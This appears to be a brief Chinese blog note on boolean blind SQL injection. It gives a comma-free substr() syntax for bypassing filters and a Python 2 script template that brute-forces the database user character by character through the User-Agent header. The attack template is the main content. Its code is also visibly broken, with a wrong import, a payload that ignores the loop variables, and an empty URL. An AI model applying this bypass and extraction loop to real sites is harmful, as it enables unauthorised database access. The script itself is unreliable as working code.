最近看见了这个Bool盲注挺有趣,做个记录!
小技巧:
substr(user(),1,1)
等价于
substr(user() from 1 for 1) 可以绕过逗号
参考脚本模板程序:
1 import request 2 import re 3 4 pattern = re.compile(r'2014-11-16') #此处是关键字 5 6 for count in range(1,100): 7 for character in range(0,128): 8 payload = 'user()' 9 request = urllib2.Request('') 10 #其中单引号中放注入的url 11 request.add_header('User-Agent','') 12 #其中单引号中放User-Agent对应的东东! 13 response = urllib2.urlopen(request) 14 #print character 15 match = pattern.search(response.read()) 16 if match: 17 if character == 0: 18 exit(0) 19 else: 20 print '%d -- %s'%(count,chr(character)) 21 #print match.group() 22 break 23
参考:这里